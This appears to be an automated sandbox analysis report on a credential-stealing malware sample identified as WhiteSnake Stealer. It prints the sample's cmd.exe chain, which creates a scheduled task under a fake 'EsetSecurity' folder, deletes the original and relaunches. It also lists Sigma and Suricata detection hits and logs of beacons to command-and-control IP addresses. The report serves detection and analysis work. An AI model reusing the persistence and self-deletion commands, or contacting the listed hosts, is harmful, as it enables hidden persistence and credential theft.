"C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe" , ParentImage: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe, ParentProcessId: 6420, ParentProcessName: tDLozbx48F.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "tDLozbx48F" /sc MINUTE /tr "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe" /rl LIMITED /f && DEL /F /S /Q /A "C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe" &&START "" "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe", ProcessId: 6340, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Communication To Uncommon Destination Ports

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 140.238.218.94, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe, Initiated: true, ProcessId: 4212, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49737

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn "tDLozbx48F" /sc MINUTE /tr "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe" /rl LIMITED /f , CommandLine: schtasks /create /tn "tDLozbx48F" /sc MINUTE /tr "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe" /rl LIMITED /f , CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "tDLozbx48F" /sc MINUTE /tr "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe" /rl LIMITED /f && DEL /F /S /Q /A "C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe" &&START "" "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6340, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "tDLozbx48F" /sc MINUTE /tr "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe" /rl LIMITED /f , ProcessId: 5944, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-01T22:51:51.853620+0100	2045868	1	Successful Credential Theft Detected	192.168.2.16	49737	140.238.218.94	8080	TCP
2024-12-01T22:52:12.237552+0100	2045868	1	Successful Credential Theft Detected	192.168.2.16	49766	140.238.218.94	8080	TCP
2024-12-01T22:52:13.905488+0100	2045868	1	Successful Credential Theft Detected	192.168.2.16	49769	46.235.26.83	8080	TCP
2024-12-01T22:52:15.885563+0100	2045868	1	Successful Credential Theft Detected	192.168.2.16	49771	168.119.121.16	8080	TCP
2024-12-01T22:52:18.261636+0100	2045868	1	Successful Credential Theft Detected	192.168.2.16	49774	51.77.125.62	8080	TCP
2024-12-01T22:52:34.321664+0100	2045868	1	Successful Credential Theft Detected	192.168.2.16	49776	46.235.26.83	8080	TCP
2024-12-01T22:52:36.273612+0100	2045868	1	Successful Credential Theft Detected	192.168.2.16	49777	168.119.121.16	8080	TCP
2024-12-01T22:52:38.609521+0100	2045868	1	Successful Credential Theft Detected	192.168.2.16	49778	51.77.125.62	8080	TCP
2024-12-01T22:52:40.309452+0100	2045868	1	Successful Credential Theft Detected	192.168.2.16	49779	185.189.159.121	8001	TCP
2024-12-01T22:52:42.637687+0100	2045868	1	Successful Credential Theft Detected	192.168.2.16	49780	65.21.49.163	8080	TCP
2024-12-01T22:52:45.131858+0100	2045868	1	Successful Credential Theft Detected	192.168.2.16	49781	167.86.115.218	9090	TCP
2024-12-01T22:53:00.681488+0100	2045868	1	Successful Credential Theft Detected	192.168.2.16	49782	185.189.159.121	8001	TCP
2024-12-01T22:53:02.437473+0100	2045868	1	Successful Credential Theft Detected	192.168.2.16	49784	65.21.49.163	8080	TCP
2024-12-01T22:53:04.825507+0100	2045868	1	Successful Credential Theft Detected	192.168.2.16	49785	167.86.115.218	9090	TCP
2024-12-01T22:53:07.161571+0100	2045868	1	Successful Credential Theft Detected	192.168.2.16	49786	46.226.106.173	8080	TCP
2024-12-01T22:53:26.945492+0100	2045868	1	Successful Credential Theft Detected	192.168.2.16	49787	46.226.106.173	8080	TCP
2024-12-01T22:53:38.825631+0100	2045868	1	Successful Credential Theft Detected	192.168.2.16	49790	77.240.38.138	8080	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-01T22:51:47.068856+0100	2803305	3	Unknown Traffic	192.168.2.16	49723	172.217.19.164	80	TCP
2024-12-01T22:51:47.293990+0100	2803305	3	Unknown Traffic	192.168.2.16	49724	172.217.19.164	80	TCP
2024-12-01T22:51:47.392343+0100	2803305	3	Unknown Traffic	192.168.2.16	49723	172.217.19.164	80	TCP
2024-12-01T22:51:47.392343+0100	2803305	3	Unknown Traffic	192.168.2.16	49723	172.217.19.164	80	TCP
2024-12-01T22:51:47.392343+0100	2803305	3	Unknown Traffic	192.168.2.16	49723	172.217.19.164	80	TCP
2024-12-01T22:51:47.392343+0100	2803305	3	Unknown Traffic	192.168.2.16	49723	172.217.19.164	80	TCP
2024-12-01T22:51:47.392343+0100	2803305	3	Unknown Traffic	192.168.2.16	49723	172.217.19.164	80	TCP
2024-12-01T22:51:47.392343+0100	2803305	3	Unknown Traffic	192.168.2.16	49723	172.217.19.164	80	TCP
2024-12-01T22:51:47.392343+0100	2803305	3	Unknown Traffic	192.168.2.16	49723	172.217.19.164	80	TCP
2024-12-01T22:51:47.532113+0100	2803305	3	Unknown Traffic	192.168.2.16	49724	172.217.19.164	80	TCP
2024-12-01T22:51:47.532113+0100	2803305	3	Unknown Traffic	192.168.2.16	49724	172.217.19.164	80	TCP
2024-12-01T22:51:47.532113+0100	2803305	3	Unknown Traffic	192.168.2.16	49724	172.217.19.164	80	TCP
2024-12-01T22:51:47.532113+0100	2803305	3	Unknown Traffic	192.168.2.16	49724	172.217.19.164	80	TCP
2024-12-01T22:51:47.532113+0100	2803305	3	Unknown Traffic	192.168.2.16	49724	172.217.19.164	80	TCP
2024-12-01T22:51:47.532113+0100	2803305	3	Unknown Traffic	192.168.2.16	49724	172.217.19.164	80	TCP
2024-12-01T22:51:47.532113+0100	2803305	3	Unknown Traffic	192.168.2.16	49724	172.217.19.164	80	TCP
2024-12-01T22:51:47.558301+0100	2803305	3	Unknown Traffic	192.168.2.16	49723	172.217.19.164	80	TCP
2024-12-01T22:51:48.701238+0100	2803305	3	Unknown Traffic	192.168.2.16	49729	172.217.19.164	80	TCP
2024-12-01T22:51:48.701336+0100	2803305	3	Unknown Traffic	192.168.2.16	49730	172.217.19.164	80	TCP
2024-12-01T22:52:05.521020+0100	2803305	3	Unknown Traffic	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:05.641166+0100	2803305	3	Unknown Traffic	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:05.641166+0100	2803305	3	Unknown Traffic	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:05.641166+0100	2803305	3	Unknown Traffic	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:05.641166+0100	2803305	3	Unknown Traffic	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:05.641166+0100	2803305	3	Unknown Traffic	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:05.641166+0100	2803305	3	Unknown Traffic	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:05.641166+0100	2803305	3	Unknown Traffic	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:05.655819+0100	2803305	3	Unknown Traffic	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:05.920072+0100	2803305	3	Unknown Traffic	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:05.920072+0100	2803305	3	Unknown Traffic	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:05.920072+0100	2803305	3	Unknown Traffic	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:05.920072+0100	2803305	3	Unknown Traffic	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:05.920072+0100	2803305	3	Unknown Traffic	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:05.920072+0100	2803305	3	Unknown Traffic	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:05.920072+0100	2803305	3	Unknown Traffic	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:05.925658+0100	2803305	3	Unknown Traffic	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:06.040157+0100	2803305	3	Unknown Traffic	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:06.056136+0100	2803305	3	Unknown Traffic	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:06.199147+0100	2803305	3	Unknown Traffic	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:06.324209+0100	2803305	3	Unknown Traffic	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:06.324209+0100	2803305	3	Unknown Traffic	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:07.234459+0100	2803305	3	Unknown Traffic	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:07.363850+0100	2803305	3	Unknown Traffic	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:07.440453+0100	2803305	3	Unknown Traffic	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:07.440453+0100	2803305	3	Unknown Traffic	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:07.440453+0100	2803305	3	Unknown Traffic	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:07.440453+0100	2803305	3	Unknown Traffic	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:07.440453+0100	2803305	3	Unknown Traffic	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:07.440453+0100	2803305	3	Unknown Traffic	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:07.440453+0100	2803305	3	Unknown Traffic	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:07.440453+0100	2803305	3	Unknown Traffic	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:07.440453+0100	2803305	3	Unknown Traffic	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:07.440453+0100	2803305	3	Unknown Traffic	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:07.580733+0100	2803305	3	Unknown Traffic	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:07.580733+0100	2803305	3	Unknown Traffic	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:07.580733+0100	2803305	3	Unknown Traffic	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:07.580733+0100	2803305	3	Unknown Traffic	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:07.580733+0100	2803305	3	Unknown Traffic	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:07.580733+0100	2803305	3	Unknown Traffic	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:07.580733+0100	2803305	3	Unknown Traffic	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:07.580733+0100	2803305	3	Unknown Traffic	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:07.580733+0100	2803305	3	Unknown Traffic	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:08.818855+0100	2803305	3	Unknown Traffic	192.168.2.16	49757	172.217.19.164	80	TCP
2024-12-01T22:52:08.819268+0100	2803305	3	Unknown Traffic	192.168.2.16	49756	172.217.19.164	80	TCP
2024-12-01T22:52:10.581610+0100	2803305	3	Unknown Traffic	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:10.701979+0100	2803305	3	Unknown Traffic	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:10.714046+0100	2803305	3	Unknown Traffic	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:10.834328+0100	2803305	3	Unknown Traffic	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:11.182407+0100	2803305	3	Unknown Traffic	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:11.182407+0100	2803305	3	Unknown Traffic	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:11.182407+0100	2803305	3	Unknown Traffic	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:11.182407+0100	2803305	3	Unknown Traffic	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:11.182407+0100	2803305	3	Unknown Traffic	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:11.182407+0100	2803305	3	Unknown Traffic	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:11.182407+0100	2803305	3	Unknown Traffic	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:11.182407+0100	2803305	3	Unknown Traffic	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:11.182407+0100	2803305	3	Unknown Traffic	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:11.182407+0100	2803305	3	Unknown Traffic	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:11.333888+0100	2803305	3	Unknown Traffic	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:11.333888+0100	2803305	3	Unknown Traffic	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:11.333888+0100	2803305	3	Unknown Traffic	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:11.333888+0100	2803305	3	Unknown Traffic	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:11.333888+0100	2803305	3	Unknown Traffic	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:11.333888+0100	2803305	3	Unknown Traffic	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:11.333888+0100	2803305	3	Unknown Traffic	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:11.333888+0100	2803305	3	Unknown Traffic	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:11.333888+0100	2803305	3	Unknown Traffic	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:11.333888+0100	2803305	3	Unknown Traffic	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:12.394775+0100	2803305	3	Unknown Traffic	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:12.875098+0100	2803305	3	Unknown Traffic	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:21.851256+0100	2803305	3	Unknown Traffic	192.168.2.16	49773	192.0.78.152	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

ReversingLabs: Detection: 91%

Multi AV Scanner detection for submitted file

Source: tDLozbx48F.exe

ReversingLabs: Detection: 91%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: tDLozbx48F.exe

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 159.69.63.226:443 -> 192.168.2.16:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 159.69.63.226:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.244.42.129:443 -> 192.168.2.16:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.0.78.152:443 -> 192.168.2.16:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.244.42.65:443 -> 192.168.2.16:49770 version: TLS 1.2

Source: tDLozbx48F.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.16:49766 -> 140.238.218.94:8080
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.16:49769 -> 46.235.26.83:8080
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.16:49771 -> 168.119.121.16:8080
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.16:49737 -> 140.238.218.94:8080
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.16:49776 -> 46.235.26.83:8080
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.16:49774 -> 51.77.125.62:8080
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.16:49780 -> 65.21.49.163:8080
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.16:49781 -> 167.86.115.218:9090
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.16:49784 -> 65.21.49.163:8080
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.16:49779 -> 185.189.159.121:8001
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.16:49790 -> 77.240.38.138:8080
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.16:49778 -> 51.77.125.62:8080
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.16:49777 -> 168.119.121.16:8080
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.16:49785 -> 167.86.115.218:9090
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.16:49786 -> 46.226.106.173:8080
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.16:49787 -> 46.226.106.173:8080
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.16:49782 -> 185.189.159.121:8001

Queries Google from non browser process on port 80

Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Data Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Data Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /M82hfWR7nN?s=118 HTTP/1.1 Host: google.kz Connection: Keep-Alive
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Data Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
